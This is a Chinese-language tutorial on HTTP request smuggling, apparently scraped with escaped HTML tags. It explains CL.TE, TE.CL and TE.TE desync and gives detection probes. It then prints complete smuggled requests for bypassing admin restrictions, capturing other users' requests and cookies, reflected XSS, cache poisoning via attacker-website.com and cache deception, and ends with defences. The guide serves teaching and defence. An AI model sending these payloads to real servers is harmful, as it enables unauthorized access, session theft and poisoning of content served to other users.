HTTP请求走私攻击全面指南<\/h1>

1. HTTP请求走私概述<\/h2>
HTTP请求走私是一种干扰网站处理HTTP请求序列的技术，允许攻击者绕过安全控制、获取敏感数据并危害其他用户。这种攻击主要发生在前端服务器和后端服务器对客户端传入数据理解不一致的情况下。<\/p>

1.1 基本原理<\/h3>

HTTP规范提供了两种指定请求结束位置的方法：<\/p>

Content-Length<\/strong>：指示请求或响应消息体的长度（字节）<\/li>

Transfer-Encoding<\/strong>：指定消息正文使用分块编码<\/li> <\/ul>
当这两种方法同时存在且服务器处理不一致时，就会产生请求走私漏洞。<\/p>
1.2 相关协议特性<\/h3>

管道(Pipeline)<\/strong>：允许在单个TCP连接上发送多个HTTP请求而无需等待响应<\/li>
持久连接(Keep-Alive)<\/strong>：允许在单个TCP连接上发送多个HTTP请求和响应<\/li> <\/ul>
2. 请求走私类型<\/h2>
2.1 CL.TE漏洞<\/h3>
前端使用Content-Length头，后端使用Transfer-Encoding头<\/p>
攻击示例<\/strong>：<\/p>
POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 13 Transfer-Encoding: chunked 0 SMUGGLED <\/code><\/pre> 2.2 TE.CL漏洞<\/h3> 前端使用Transfer-Encoding头，后端使用Content-Length头<\/p> 攻击示例<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 3 Transfer-Encoding: chunked 8 SMUGGLED 0 <\/code><\/pre> 2.3 TE.TE漏洞<\/h3> 前后端都支持Transfer-Encoding头，但可通过混淆标头诱导其中一方不处理<\/p> 混淆方法示例<\/strong>：<\/p> Transfer-Encoding: xchunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked[space] Transfer-Encoding: chunked X: X[\n]Transfer-Encoding: chunked <\/code><\/pre> 3. 检测方法<\/h2> 3.1 时间差异检测<\/h3> CL.TE检测<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Transfer-Encoding: chunked Content-Length: 4 1 A X <\/code><\/pre> TE.CL检测<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Transfer-Encoding: chunked Content-Length: 6 0 X <\/code><\/pre> 3.2 响应差异检测<\/h3> CL.TE检测<\/strong>：<\/p> POST \/search HTTP\/1.1 Host: vulnerable-website.com Content-Type: application\/x-www-form-urlencoded Content-Length: 49 Transfer-Encoding: chunked e q=smuggling&x=0 GET \/404 HTTP\/1.1 Foo: x <\/code><\/pre> TE.CL检测<\/strong>：<\/p> POST \/search HTTP\/1.1 Host: vulnerable-website.com Content-Type: application\/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 7c GET \/404 HTTP\/1.1 Host: vulnerable-website.com Content-Type: application\/x-www-form-urlencoded Content-Length: 144 x=0 <\/code><\/pre> 4. 利用场景<\/h2> 4.1 绕过前端限制<\/h3> 示例<\/strong>：<\/p> POST \/home HTTP\/1.1 Host: vulnerable-website.com Content-Type: application\/x-www-form-urlencoded Content-Length: 62 Transfer-Encoding: chunked 0 GET \/admin HTTP\/1.1 Host: vulnerable-website.com Foo: xGET \/home HTTP\/1.1 Host: vulnerable-website.com <\/code><\/pre> 4.2 请求重写利用<\/h3> 检测重写方法<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 130 Transfer-Encoding: chunked 0 POST \/login HTTP\/1.1 Host: vulnerable-website.com Content-Type: application\/x-www-form-urlencoded Content-Length: 100 email=POST \/login HTTP\/1.1 Host: vulnerable-website.com <\/code><\/pre> 4.3 客户端认证绕过<\/h3> 示例<\/strong>：<\/p> POST \/example HTTP\/1.1 Host: vulnerable-website.com Content-Type: x-www-form-urlencoded Content-Length: 64 Transfer-Encoding: chunked 0 GET \/admin HTTP\/1.1 X-SSL-CLIENT-CN: administrator Foo: x <\/code><\/pre> 4.4 越权操作<\/h3> 捕获用户请求<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Transfer-Encoding: chunked Content-Length: 330 0 POST \/post\/comment HTTP\/1.1 Host: vulnerable-website.com Content-Type: application\/x-www-form-urlencoded Content-Length: 400 Cookie: session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Carlos+Montoya&email=carlos%40normal-user.net&website=https%3A%2F%2Fnormal-user.net&comment= <\/code><\/pre> 4.5 反射XSS利用<\/h3> 示例<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 63 Transfer-Encoding: chunked 0 GET \/ HTTP\/1.1 User-Agent: <script>alert(1)<\/script> Foo: X <\/code><\/pre> 4.6 重定向攻击<\/h3> 示例<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 54 Transfer-Encoding: chunked 0 GET \/home HTTP\/1.1 Host: attacker-website.com Foo: X <\/code><\/pre> 4.7 缓存投毒<\/h3> 示例<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 59 Transfer-Encoding: chunked 0 GET \/home HTTP\/1.1 Host: attacker-website.com Foo: XGET \/static\/include.js HTTP\/1.1 Host: vulnerable-website.com <\/code><\/pre> 4.8 缓存欺骗<\/h3> 示例<\/strong>：<\/p> POST \/ HTTP\/1.1 Host: vulnerable-website.com Content-Length: 43 Transfer-Encoding: chunked 0 GET \/private\/messages HTTP\/1.1 Foo: X <\/code><\/pre> 5. 防御措施<\/h2> 禁用前端服务器到后端服务器的连接重用<\/li> 使用HTTP\/2端到端并禁用HTTP降级<\/li> 前端服务器标准化不明确的请求<\/li> 后端服务器拒绝不明确的请求并关闭连接<\/li> 对所有应用层消息使用严格相同的web服务器软件<\/li> <\/ol> 6. 总结<\/h2> HTTP请求走私攻击利用服务器对HTTP请求处理的不一致性，可以导致多种安全风险。防御的关键在于确保前后端服务器对请求处理的一致性，并实施严格的请求验证机制。<\/p>